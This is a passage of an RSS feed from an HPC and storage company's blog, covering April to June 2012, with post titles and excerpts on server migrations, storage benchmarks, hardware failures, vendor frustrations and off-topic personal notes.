      <pubDate>Sat, 30 Jun 2012 03:54:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/06/ot-my-reading-list/</guid>
      <description>So I am off on a vacation tomorrow. Normally for our summer forays, I grab the Gardner Dozois compendium called The Year&amp;rsquo;s Best Science Fiction. I have from year 14 to the current (year 28). It&amp;rsquo;s just not summer without it. Well, it&amp;rsquo;s not out yet. It will be out on 3-July. Oh well &amp;hellip; Ok &amp;hellip; I also grab everything by Charles Stross that I have not read from the preceding year. Hey, he&amp;rsquo;s got a new Laundry book coming out!</description>
    </item>
    
    <item>
      <title>OT:  Off to a nice &#34;relaxing&#34; vacation tomorrow</title>
      <link>https://blog.scalability.org/2012/06/ot-off-to-a-nice-relaxing-vacation-tomorrow/</link>
      <pubDate>Sat, 30 Jun 2012 03:43:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/06/ot-off-to-a-nice-relaxing-vacation-tomorrow/</guid>
      <description>Long overdue. We&amp;rsquo;ve had a &amp;hellip; challenging &amp;hellip; year, starting with some family health issues, and my working from home for the first 6 weeks of the year. The company had to make an adjustment after we realized that there was a poor match of capabilities, motivation, and goals for a portion of our team. All this contributed to increasing my level of stress. So I am happy to report that we are hopping into a car (minivan really), and making the trek to Orlando, by way of Atlanta.</description>
    </item>
    
    <item>
      <title>[updated] Lumps ...</title>
      <link>https://blog.scalability.org/2012/06/yes-i-really-like-it-when-we-take-lumps-for-supplier-snafus/</link>
      <pubDate>Mon, 25 Jun 2012 22:24:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/06/yes-i-really-like-it-when-we-take-lumps-for-supplier-snafus/</guid>
      <description>[Update] Not all of the issues were with the supplier. I started investigating and found out that we deserved some of the lumps. Me in particular for not paying more attention to the situation as it evolved. I made the assumption that someone else was covering it, and I didn&amp;rsquo;t need to. As I&amp;rsquo;ve discovered, this was a mistake on my part. The story is more annoying than I allude to here.</description>
    </item>
    
    <item>
      <title>(nearly) a Gigaflop at your side</title>
      <link>https://blog.scalability.org/2012/06/nearly-a-gigaflop-at-your-side/</link>
      <pubDate>Wed, 20 Jun 2012 13:26:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/06/nearly-a-gigaflop-at-your-side/</guid>
      <description>First impression: this is so wrong &amp;hellip; so &amp;hellip; very wrong &amp;hellip; Second impression: well, mebbe not.
Seriously though, this is a natural evolution of a public &amp;ldquo;flash&amp;rdquo; cloud. This is 1/5 of a gigaflop, which as a grad student 22+ years ago, I would have sacrificed for. I don&amp;rsquo;t think it will be too long before we are seeing multi-GFLOP on our hips. In which case, apart from network latency and storage bandwidth and size &amp;hellip; you&amp;rsquo;ve got a seething mobile computing platform out there with a huge aggregate capability.</description>
    </item>
    
    <item>
      <title>Security and legal implications of the data bandwidth wall</title>
      <link>https://blog.scalability.org/2012/06/security-and-legal-implications-of-the-data-bandwidth-wall/</link>
      <pubDate>Wed, 20 Jun 2012 03:54:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/06/security-and-legal-implications-of-the-data-bandwidth-wall/</guid>
      <description>Again, hat tip to Alastair who pointed me at this article. At the most basic level, there are real costs, and real consequences to not being able to act nimbly, and leverage the bandwidth you need to perform the operations you require to successfully perform your job functions. These consequences could have some significant implications for legal cases. Or for terror threats. What if you have a trove of data, that you have to act quickly upon?</description>
    </item>
    
    <item>
      <title>Security and legal implications of the data bandwidth wall, part 0</title>
      <link>https://blog.scalability.org/2012/06/security-and-legal-implications-of-the-data-bandwidth-wall-part-0/</link>
      <pubDate>Sun, 17 Jun 2012 14:44:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/06/security-and-legal-implications-of-the-data-bandwidth-wall-part-0/</guid>
      <description>Had a link sent in (hat tip to Alastair) with a story that perfectly illustrates the data bandwidth wall, and our ability to act in a legal manner with respect to it. There are broader implications, and &amp;hellip; to us &amp;hellip; something of a surprising connection to the company. And a serious indictment of the current US government procurement process. This story has EPIC FAILURE (for the US government) written all over it, for multiple reasons.</description>
    </item>
    
    <item>
      <title>Bad decisions in retrospect</title>
      <link>https://blog.scalability.org/2012/06/bad-decisions-in-retrospect/</link>
      <pubDate>Wed, 13 Jun 2012 18:02:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/06/bad-decisions-in-retrospect/</guid>
      <description>We&amp;rsquo;ve made one in particular that is causing me to (seriously) regret our choice. We use wiki software for our documentation and internal site(s). We had chosen dekiwiki as our platform, based upon our perceived need for ease of use, access control, and other features. The first wiki went up fine. This was an internal wiki for knowledge capture. The second wiki came up fine, for documentation. I like living documentation we can annotate.</description>
    </item>
    
    <item>
      <title>Is flash a flash in the pan?</title>
      <link>https://blog.scalability.org/2012/06/is-flash-a-flash-in-the-pan/</link>
      <pubDate>Wed, 13 Jun 2012 03:40:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/06/is-flash-a-flash-in-the-pan/</guid>
      <description>This article makes the case that it is. As with many articles about X dying, it&amp;rsquo;s worth asking if the argument makes sense. Basically, the point they are making boils down to density, resiliency, and other aspects. Specifically, they point out that the fundamental flash design is inherently flawed &amp;hellip; it self destructs after a while &amp;hellip; wears out. So their argument begins: the denser the bits per cell, the fewer write cycles before the cell is unusable.</description>
    </item>
    
    <item>
      <title>OT:  Wishing for more competition in cellular phones ...</title>
      <link>https://blog.scalability.org/2012/06/ot-wishing-for-more-competition-in-cellular-phones/</link>
      <pubDate>Sat, 09 Jun 2012 20:09:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/06/ot-wishing-for-more-competition-in-cellular-phones/</guid>
      <description>Just spent 3+ hours dealing with Verizon over setting up a business account for the company, moving phones/mifi to this, and getting a new line. Discovering in the process that the company doesn&amp;rsquo;t quite grok business customers. Or its own products. Or what its sold. Sadly, Verizon&amp;rsquo;s network is the best. Sadly, they are &amp;hellip; a royal pain &amp;hellip; to deal with. Very long story, wish it weren&amp;rsquo;t as bad as it is here.</description>
    </item>
    
    <item>
      <title>code angry: Application gateway via very powerful Perl code</title>
      <link>https://blog.scalability.org/2012/06/code-angry/</link>
      <pubDate>Tue, 05 Jun 2012 06:18:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/06/code-angry/</guid>
      <description>I&amp;rsquo;ve been banging my head against fastcgi. At a fundamental level, fastcgi is meant to be a CGI gateway allowing multiple simultaneous processes to run at once, to serve pages. Ok. nginx (and Apache, and others) can use fastcgi to run PHP code. Well, Apache can run it &amp;ldquo;natively&amp;rdquo; while the others need to run it externally. Our website is PHP based (drupal). So are some of our tools. And ya know, the transition to nginx has not been smooth for them.</description>
    </item>
    
    <item>
      <title>A lesson in economics</title>
      <link>https://blog.scalability.org/2012/06/a-lesson-in-economics/</link>
      <pubDate>Sat, 02 Jun 2012 19:51:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/06/a-lesson-in-economics/</guid>
      <description>This is somewhat tangential (at least the initial part) to HPC and storage, but it has significant similarities &amp;hellip; it&amp;rsquo;s worth paying attention to. Much text, noise, and argumentation have surrounded things like Obamacare here in the US. This is, whether the proponents like to admit it or not, a push for a socialized medical system, with &amp;ldquo;controlled&amp;rdquo; costs, and all manner of other things. Yeah, we&amp;rsquo;ll hear how the US has &amp;ldquo;crappy&amp;rdquo; medical coverage, or how country X is so much better because everyone gets coverage.</description>
    </item>
    
    <item>
      <title>Nginx rules ...</title>
      <link>https://blog.scalability.org/2012/06/nginx-rules/</link>
      <pubDate>Fri, 01 Jun 2012 15:05:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/06/nginx-rules/</guid>
      <description>I was having lots &amp;hellip; and I mean LOTS of trouble with apache 2.2 on the new web server. It simply refused to do vhosts no matter what I did. Debugging it was painful. I&amp;rsquo;d tried lighttpd in the past, and while I liked some aspects of it better than Apache, it still was hard to debug. So I figured I&amp;rsquo;d give nginx a try. It&amp;rsquo;s an up and comer in the web serving business, and seems to be one of the fastest growing on the net.</description>
    </item>
    
    <item>
      <title>... and the VM (and its snapshot) managed to get corrupted ...</title>
      <link>https://blog.scalability.org/2012/05/and-the-vm-and-its-snapshot-managed-to-get-corrupted/</link>
      <pubDate>Thu, 31 May 2012 05:41:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/and-the-vm-and-its-snapshot-managed-to-get-corrupted/</guid>
      <description>Talking about rt. Our support site. Thankfully most of the stuff is in the database with a little customization. Thankfully we want to move from 3.x to 4.x. Annoyingly, this is more work. Thankfully, our web server design is now far more intelligent than in the past. We may simply run it on the web frontend directly, rather than running it as a VM. There&amp;rsquo;s really little advantage to the VM, and we keep having to do a reset of the VM.</description>
    </item>
    
    <item>
      <title>Why ... oh ... why ...</title>
      <link>https://blog.scalability.org/2012/05/why-oh-why/</link>
      <pubDate>Thu, 31 May 2012 05:07:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/why-oh-why/</guid>
      <description>Dear Red Hat: You put out a good product in RHEL 6.x. Ignoring the (often massive) performance regressions, other things are better/more stable. Dracut is growing on me. Actually liking being able to debug startup. But, this said &amp;hellip; I have to inquire &amp;hellip; Why on earth did you include an End-Of-Lifed version of Perl (5.10.x) in RHEL 6.x? What &amp;hellip; exactly &amp;hellip; was the thought process behind this? Have a look here: and search for &amp;ldquo;Latest releases in each branch&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>Snort ... guffaw .... cackle ...</title>
      <link>https://blog.scalability.org/2012/05/snort-guffaw-cackle/</link>
      <pubDate>Wed, 30 May 2012 03:31:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/snort-guffaw-cackle/</guid>
      <description>Enjoyed this read. Some of the take away snippets
Ok, there is a combination of humor, and a possible simple test to determine if you are one of them thar bad &amp;ldquo;right-wingers&amp;rdquo; (note: tongue firmly planted in cheek here). Just ask a) education level, and b) opinion of AGW. But even more than this &amp;hellip; this study was driven by the soft science folks wondering about some attitudes and levels of scientific literacy and numeracy.</description>
    </item>
    
    <item>
      <title>RIP Kyril Faenov</title>
      <link>https://blog.scalability.org/2012/05/rip-kyril-faenov/</link>
      <pubDate>Wed, 30 May 2012 00:08:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/rip-kyril-faenov/</guid>
      <description>Kyril Faenov of Microsoft passed away several days ago. He was one of the visionaries and leaders behind Microsoft&amp;rsquo;s HPC effort. He was also a nice guy, one whom I had a chance to talk with several times over the last few years. One of the bright folks you like to challenge. I respected him and his efforts, even if I didn&amp;rsquo;t agree with them. More information here, and I found this originally at InsideHPC.</description>
    </item>
    
    <item>
      <title>Stress analysis of a market ...  does this explain Facebook&#39;s IPO issues?</title>
      <link>https://blog.scalability.org/2012/05/stress-analysis-of-a-market-does-this-explain-facebooks-ipo-issues/</link>
      <pubDate>Sat, 26 May 2012 20:44:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/stress-analysis-of-a-market-does-this-explain-facebooks-ipo-issues/</guid>
      <description>c.f. this post at ZeroHedge.
In case you haven&amp;rsquo;t guessed it, ZeroHedge does not like HFT, aka algorithmic trading. It&amp;rsquo;s an informative blog &amp;hellip; sometimes bordering on alarmist &amp;hellip; but for the most part, a good read.</description>
    </item>
    
    <item>
      <title>Misalignment of performance expectations and reality</title>
      <link>https://blog.scalability.org/2012/05/misalignment-of-performance-expectations-and-reality/</link>
      <pubDate>Sat, 26 May 2012 18:08:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/misalignment-of-performance-expectations-and-reality/</guid>
      <description>We are working on a project for a consulting customer. They&amp;rsquo;ve hired us to help them figure out where their performance is being &amp;ldquo;lost&amp;rdquo;. Obviously, without naming names or revealing information, I note something interesting about this, that I&amp;rsquo;ve alluded to many times before. There is an often profound mismatch between expectations for a system and what it actually achieves. This is in large part, why we benchmark and test our systems in as real configurations as possible, and report real numbers, while many (most) of our competitors make WAGs at best case/best effort/best condition theoretical numbers.</description>
    </item>
    
    <item>
      <title>siFlash tuning</title>
      <link>https://blog.scalability.org/2012/05/siflash-tuning/</link>
      <pubDate>Fri, 25 May 2012 16:47:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/siflash-tuning/</guid>
      <description>We&amp;rsquo;ve been tuning our siFlash. Not done yet &amp;hellip; not done, but look where we are. 24 simultaneous streaming (non-cached) reads.
Run status group 0 (all jobs):
   READ: io=193632MB, aggrb=7781.4MB/s, minb=7781.4MB/s, maxb=7781.4MB/s, mint=24884msec, maxt=24884msec
Yeah. Baby. Added almost another GB/s to the read performance. Streaming write performance is hovering around 2.6GB/s. Remember, this is a half configured system. Imagine what we could do with a fully configured system. Sustaining 147k random write IOPs (4k random writes, with 144 simultaneous threads), and 210k random read IOPs.</description>
    </item>
    
    <item>
      <title>What high performance isn&#39;t</title>
      <link>https://blog.scalability.org/2012/05/what-high-performance-isnt/</link>
      <pubDate>Fri, 25 May 2012 09:49:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/what-high-performance-isnt/</guid>
      <description>We&amp;rsquo;ve had a number of interesting interactions with customers over the last few weeks. They all seem to center on, and around, how to get high performance out of gear which isn&amp;rsquo;t designed for high performance. Generally speaking, you can&amp;rsquo;t. High performance requires a mixture of design and implementation, with well designed and implemented parts. High performance isn&amp;rsquo;t
 A random collection of web and file servers joined together with clustering tools
 Some random tier 1 box usually used as a lower end file server shoved with disks/SSD/Flash
 A poorly architected, but easy to purchase system (e.</description>
    </item>
    
    <item>
      <title>Thinking of using Warewulf as a base for some of our diskless work</title>
      <link>https://blog.scalability.org/2012/05/thinking-of-using-warewulf-as-a-base-for-some-of-our-diskless-work/</link>
      <pubDate>Thu, 24 May 2012 04:54:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/thinking-of-using-warewulf-as-a-base-for-some-of-our-diskless-work/</guid>
      <description>I&amp;rsquo;ve been thinking about this for a while. We have a good diskless system, but I&amp;rsquo;ve always liked the nano-ramdisk version of the OS. Create a base distro with JEOS (just enough OS) to boot, and mount all the other bits you need. Not that there is anything wrong with what we are doing now; it&amp;rsquo;s just that I really like that capability. Especially if we could keep the ramdisk compressed.</description>
    </item>
    
    <item>
      <title>An NFS gotcha</title>
      <link>https://blog.scalability.org/2012/05/an-nfs-gotcha/</link>
      <pubDate>Thu, 24 May 2012 04:44:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/an-nfs-gotcha/</guid>
      <description>As we rebuild our server infrastructure (aside from taking time to do things more intelligently), we run into some bumps. This one sorta threw me for a bit.
[root@virtual ~]# mount -a
mount.nfs: Stale NFS file handle
mount.nfs: Stale NFS file handle
Checked all the usual suspects. No dice. The /etc/exports was correct, and visible locally. There was a DNS oddity I resolved (humor &amp;hellip; heh). But mounts kept giving me the stale NFS handle.</description>
    </item>
    
    <item>
      <title>When core assumptions that should never be wrong, do turn out to be wrong</title>
      <link>https://blog.scalability.org/2012/05/when-core-assumptions-that-should-never-be-wrong-do-turn-out-to-be-wrong/</link>
      <pubDate>Wed, 23 May 2012 01:23:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/when-core-assumptions-that-should-never-be-wrong-do-turn-out-to-be-wrong/</guid>
      <description>So &amp;hellip; where does this tale begin? We had a nice backup system in place at the lab. Twice a week, all the important servers would happily sync their contents to this unit over Gigabit ethernet. It worked well, we were happy. Place that snippet in the background, it will come up again. I&amp;rsquo;ve told our customers for a long time that RAID is not a backup. RAID is RAID, it gives you time to recover from a failure.</description>
    </item>
    
    <item>
      <title>... and it can talk ...</title>
      <link>https://blog.scalability.org/2012/05/and-it-can-talk/</link>
      <pubDate>Fri, 18 May 2012 18:38:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/and-it-can-talk/</guid>
      <description>[root@skunkworks-prototype-n2 ~]# ifinfo
device:	address/netmask	MTU	Tx (MB)	Rx (MB)
eth0:	addr not set/mask not set	1500	0.000	0.000
eth1:	addr not set/mask not set	1500	0.000	0.000
eth10:	addr not set/mask not set	1500	0.000	0.000
eth11:	addr not set/mask not set	1500	0.000	0.000
eth12:	addr not set/mask not set	1500	0.000	0.000
eth13:	addr not set/mask not set	1500	0.000	0.000
eth14:	addr not set/mask not set	1500	0.</description>
    </item>
    
    <item>
      <title>Its ... alive ....</title>
      <link>https://blog.scalability.org/2012/05/its-alive/</link>
      <pubDate>Thu, 17 May 2012 20:24:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/its-alive/</guid>
      <description>Our little skunkworks project boots!!! Mwahahahaha! Must check off on our list
 design build boot ??? profit (or something)!  Note to self: work on eeeeevul laughter &amp;hellip;. And get step 4 ironed out too.</description>
    </item>
    
    <item>
      <title>After 4 years, our deskside JackRabbit unit decided to shrug off its mortal coil</title>
      <link>https://blog.scalability.org/2012/05/after-4-years-our-deskside-jackrabbit-unit-decided-to-shrug-off-its-mortal-coil/</link>
      <pubDate>Wed, 16 May 2012 20:12:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/after-4-years-our-deskside-jackrabbit-unit-decided-to-shrug-off-its-mortal-coil/</guid>
      <description>&amp;hellip; and in the process, take down a drive, 5 of its friends, and our RAID card. We have backups from before the move (15+ days old &amp;hellip; sigh). We&amp;rsquo;ve decided to go full monty on the new unit. It&amp;rsquo;s a JackRabbit JR4 with 12x 2TB drives, 2 hot spares, and a 10 disk RAID6 (8x data drives). 2x OS drives (on SSDs, rear mount). Leaves us 12 open bays.</description>
    </item>
    
    <item>
      <title>Updating a design to modern concepts ...</title>
      <link>https://blog.scalability.org/2012/05/3822/</link>
      <pubDate>Wed, 16 May 2012 01:24:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/3822/</guid>
      <description>So in order to (really) bring my monitoring app into the modern age, I want to change its flow from a synchronous on-demand event driven analysis and reporting tool, to an asynchronous monitoring and analysis tool, with an on-demand &amp;ldquo;report&amp;rdquo; function which is basically a presentation core atop the data set. There are many reasons for this. Not the least of which is that this should be far more efficient at handling what I want to do &amp;hellip; not to mention more responsive.</description>
    </item>
    
    <item>
      <title>Spam that made my day</title>
      <link>https://blog.scalability.org/2012/05/spam-that-made-my-day/</link>
      <pubDate>Tue, 15 May 2012 19:51:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/spam-that-made-my-day/</guid>
      <description>This is seriously &amp;hellip; seriously funny. Note the addresses.
 
 ROTFLMAO!!!!</description>
    </item>
    
    <item>
      <title>Every now and then, the truth leaks out</title>
      <link>https://blog.scalability.org/2012/05/every-now-and-then-the-truth-leaks-out/</link>
      <pubDate>Tue, 15 May 2012 17:26:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/every-now-and-then-the-truth-leaks-out/</guid>
      <description>Good article from Matt Asay in The Register today.
This is about as truthful as it gets. There are many tiny startups, pulling in various fractions of $1M to more than $10M to develop &amp;hellip; product features. Is this really the right approach for VCs? And this opens up some interesting new questions on startups and their product offerings themselves. Take Netflix. Running on Amazon S3. And what does Amazon do?</description>
    </item>
    
    <item>
      <title>On my fun end of a week ...</title>
      <link>https://blog.scalability.org/2012/05/on-my-fun-end-of-a-week/</link>
      <pubDate>Tue, 15 May 2012 07:00:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/on-my-fun-end-of-a-week/</guid>
      <description>(this was actually a while ago, just getting to publishing it now). Friday, I drove up to a local University to drop off our bid. I sent a note beforehand to let them know I might be a few minutes late, there was construction. Sure enough, got caught in a 30 minute slowdown. I was 13 minutes late. They said, &amp;ldquo;hey that&amp;rsquo;s great. We won&amp;rsquo;t look at it&amp;rdquo; Then on the way back, the old landlord refused to acknowledge that we were tenants, so they refused to refund our deposit.</description>
    </item>
    
    <item>
      <title>2 out of 3 ain&#39;t bad</title>
      <link>https://blog.scalability.org/2012/05/2-out-of-3-aint-bad/</link>
      <pubDate>Tue, 15 May 2012 06:46:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/2-out-of-3-aint-bad/</guid>
      <description>No, not Meatloaf lyrics. A few years ago, I guessed that the HPC market was going to bifurcate or possibly trifurcate. Well, it&amp;rsquo;s about 3 years on, and bifurcate it did. Accelerators (in the form of GPUs) are everywhere. I was dead on correct in almost every aspect of what I had predicted (privately to VCs, from whom we couldn&amp;rsquo;t raise a cent in the early/mid 2000&amp;rsquo;s for this market). Remote cluster/clouds with dropping prices per CPU hour are taking over sections of HPC, and we see some impact upon purchase decisions made by people buying clusters.</description>
    </item>
    
    <item>
      <title>Parsing apache logs ...</title>
      <link>https://blog.scalability.org/2012/05/parsing-apache-logs/</link>
      <pubDate>Mon, 07 May 2012 03:43:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/parsing-apache-logs/</guid>
      <description>Seems I&amp;rsquo;m not alone in the world wanting to parse apache log files. I googled lots of people bitterly complaining about it. Some folks wanted to write a grammar, and a flex/yacc/bison thingy. I am sure that there are some Java programmers who&amp;rsquo;ve been working on this &amp;hellip; oh &amp;hellip; 6 or 7 years or so, and may be approaching a solution, with a Java byte code only slightly below 1 PB in size.</description>
    </item>
    
    <item>
      <title>Good programming tools and good program implementation</title>
      <link>https://blog.scalability.org/2012/05/good-programming-tools-and-good-program-implementation/</link>
      <pubDate>Sun, 06 May 2012 17:14:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/good-programming-tools-and-good-program-implementation/</guid>
      <description>Way back in my early days at web programming stuff, I started out with HTML::Mason as a templating engine. There is nothing wrong with Mason, it&amp;rsquo;s actually quite good. But it encourages the same sort of &amp;ldquo;code-in-page&amp;rdquo; designs that the entire language of PHP was built around. I&amp;rsquo;m mostly a Perl guy for application level stuff these days &amp;hellip; have done my time with Fortran, Python, x86 assembly, C/C++, and many others.</description>
    </item>
    
    <item>
      <title>Company&#39;s email and web are now on EC2</title>
      <link>https://blog.scalability.org/2012/05/companys-email-and-web-are-now-on-ec2/</link>
      <pubDate>Sun, 06 May 2012 16:34:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/companys-email-and-web-are-now-on-ec2/</guid>
      <description>Turns out Comcast doesn&amp;rsquo;t follow through (even when you call them many times to try to get them to). Thanks #Comcast . On Thursday, I bought a Mifi (pay as you go) from Verizon. Got it into the office. Had moved the web/mail stuff to Amazon EC2 &amp;ldquo;just in case&amp;rdquo; Comcast pulled a &amp;hellip; well &amp;hellip; Comcast. Yeah, took me a little while to fix the email and web side. We&amp;rsquo;ve been using our router appliance as our SOA for dns, and I had to unplug it at the old site (got everything out before 5pm Friday).</description>
    </item>
    
    <item>
      <title>What high performance storage isn&#39;t ...</title>
      <link>https://blog.scalability.org/2012/05/what-high-performance-storage-isnt/</link>
      <pubDate>Sun, 06 May 2012 15:51:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/what-high-performance-storage-isnt/</guid>
      <description>This happens often. We get a call from a user who&amp;rsquo;s seen my postings in the Gluster or other lists. They&amp;rsquo;ve set up a storage system, and the performance is terrible. Is there anything that can be done about this? We dig into this, and find out that the people bought hardware, usually fairly low end/cheap brand name (e.g. tier 1) nodes, with limited disk options, and are running 1 disk for OS, and have another single larger SATA or SAS disk for storage.</description>
    </item>
    
    <item>
      <title>... and old faces leaving and new joining</title>
      <link>https://blog.scalability.org/2012/05/and-old-faces-leaving-and-new-joining/</link>
      <pubDate>Thu, 03 May 2012 01:56:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/and-old-faces-leaving-and-new-joining/</guid>
      <description>One of our guys has left the organization. This is always hard. He is a good person, I like him a great deal. But I understand that sometimes there isn&amp;rsquo;t as good a fit as we might like there to be. If you happen to know a great HPC organization that needs an awesome senior sales dude, please email me at the day job (landman At ScalableInformatics.com), and I&amp;rsquo;ll pass the contact along to him.</description>
    </item>
    
    <item>
      <title>New office ...</title>
      <link>https://blog.scalability.org/2012/05/new-office/</link>
      <pubDate>Thu, 03 May 2012 01:53:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/new-office/</guid>
      <description>&amp;hellip; movers pick up the old office bits tomorrow, and bring it to the new office. Have some (re)construction to do, some racks to stand up, an AC unit to hook up &amp;hellip; and then the important things (which I learnt from my friends and customers in the UK) &amp;hellip; a refrigerator and good cappuccino machine to buy &amp;hellip;</description>
    </item>
    
    <item>
      <title>Something ... awesome ... this way comes</title>
      <link>https://blog.scalability.org/2012/05/something-awesome-this-way-comes/</link>
      <pubDate>Thu, 03 May 2012 01:51:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/something-awesome-this-way-comes/</guid>
      <description>Ever had an OMFG moment? Ever wish you could share it? In time, in time.</description>
    </item>
    
    <item>
      <title>Q: So why did this go &#34;bang&#34; ?</title>
      <link>https://blog.scalability.org/2012/05/q-so-why-did-this-go-bang/</link>
      <pubDate>Thu, 03 May 2012 01:47:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/q-so-why-did-this-go-bang/</guid>
      <description>A: I updated the OS. Bad &amp;hellip; bad Joe. Very bad. Don&amp;rsquo;t do that. Baaaaaaad Joe. &amp;hellip; and now I get to fix the email, and the file server portion &amp;hellip; and &amp;hellip; Thank gosh for my &amp;hellip; er &amp;hellip; paranoid backing up of useful things. Pack-rat-ism is not a disease &amp;hellip; its a quality &amp;hellip; a feature.</description>
    </item>
    
    <item>
      <title>Python ... grrrr</title>
      <link>https://blog.scalability.org/2012/04/python-grrrr/</link>
      <pubDate>Thu, 26 Apr 2012 03:12:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/python-grrrr/</guid>
      <description>Hacking up some python classes and object bits for a project. Honestly, this would be soooooo much easier in Perl, but for a number of reasons, the person started it in Python. So we are trying to contribute. And I am running into some of the more joyous elements of python. Such as completely inane error messages which tell you next to zero about what the real problem is. Thankfully, I have google.</description>
    </item>
    
    <item>
      <title>Ahhh ... IPsec ... How I loathe thee ...</title>
      <link>https://blog.scalability.org/2012/04/ahhh-ipsec-how-i-loath-thee/</link>
      <pubDate>Wed, 25 Apr 2012 15:09:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/ahhh-ipsec-how-i-loath-thee/</guid>
      <description>Ok, maybe not the spec so much. Maybe just the client codes. Working on setting up an IPsec tunnel. The only IPsec implementation that I&amp;rsquo;ve tried on the client side that actually seems to work (e.g. get to a point where I can debug it) is Apple&amp;rsquo;s. Haven&amp;rsquo;t tried the Cisco yet, we don&amp;rsquo;t have a support contract with them, so we can&amp;rsquo;t download it and test it. Since we are setting this up for a customer who does, either we&amp;rsquo;ll VPN into their site and set it up, or work something out.</description>
    </item>
    
    <item>
      <title>OT: as the political season rolls on ...</title>
      <link>https://blog.scalability.org/2012/04/ot-as-the-political-season-rolls-on/</link>
      <pubDate>Wed, 25 Apr 2012 15:01:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/ot-as-the-political-season-rolls-on/</guid>
      <description>I&amp;rsquo;ve mentioned it before here, that this is a presidential election year in the US, and I expect it to be a nasty one, at best. We in the states largely fall into one of two major parties, with some of us proclaiming independence or preference for other parties in the noise. The media in this country is biased pretty hard in one direction with one solitary exception. Every now and then they admit it (as the NY Times did a few days ago).</description>
    </item>
    
    <item>
      <title>Epic failure: Apple security mismatches</title>
      <link>https://blog.scalability.org/2012/04/epic-failure-apple-security-mismatches/</link>
      <pubDate>Mon, 23 Apr 2012 15:39:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/epic-failure-apple-security-mismatches/</guid>
      <description>Was trying to install an app on Saturday. Up popped a request for more information, including a second attempt at getting my password, and then 3 &amp;ldquo;security&amp;rdquo; questions, including &amp;ldquo;What city was I first kissed in?&amp;rdquo; Um. Ok. That is an EPIC FAIL in and of itself, but let&amp;rsquo;s go on to the real &amp;hellip; BIG EPIC FAIL. The security questions presented on the Apple app do not match those, or even come close to matching those on the appleid.</description>
    </item>
    
    <item>
      <title>The TB sprint updated ...</title>
      <link>https://blog.scalability.org/2012/04/the-tb-sprint-updated/</link>
      <pubDate>Mon, 23 Apr 2012 06:18:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/the-tb-sprint-updated/</guid>
      <description>Previous results here. 12.4TB/hour. A new JackRabbit unit with some updates. New results: 1TB written in 228.2 seconds. 15.8TB/hour writes
Run status group 0 (all jobs): WRITE: io=1024.6GB, aggrb=4597.1MB/s, minb=4597.1MB/s, maxb=4597.1MB/s, mint=228167msec, maxt=228167msec  and for the reads &amp;hellip;
Run status group 0 (all jobs): READ: io=1024.6GB, aggrb=5341.9MB/s, minb=5341.9MB/s, maxb=5341.9MB/s, mint=196392msec, maxt=196392msec  This is 18.3TB/hour reads. Writing 1PB on this machine would take almost 65 hours. So if we could break the writes across 65 machines (9 racks), we could write 1PB in 1 hour.</description>
    </item>
    
    <item>
      <title>PHD comics ... the movie</title>
      <link>https://blog.scalability.org/2012/04/phd-comics-the-movie/</link>
      <pubDate>Mon, 23 Apr 2012 03:25:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/phd-comics-the-movie/</guid>
      <description>See info here.</description>
    </item>
    
    <item>
      <title>Oh joy ...</title>
      <link>https://blog.scalability.org/2012/04/oh-joy/</link>
      <pubDate>Fri, 20 Apr 2012 16:00:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/oh-joy/</guid>
      <description>Pretty good probability I&amp;rsquo;ll be needing to go to London this weekend to fix a problem caused by a somewhat overzealous local support org. See the motherboard post from a few days ago. Turns out they damaged the replacement they put in. I like London. I don&amp;rsquo;t like having to do this though.</description>
    </item>
    
    <item>
      <title>Update on our lawyergram</title>
      <link>https://blog.scalability.org/2012/04/update-on-our-lawyergram/</link>
      <pubDate>Thu, 19 Apr 2012 05:16:42 +0000</pubDate>
      
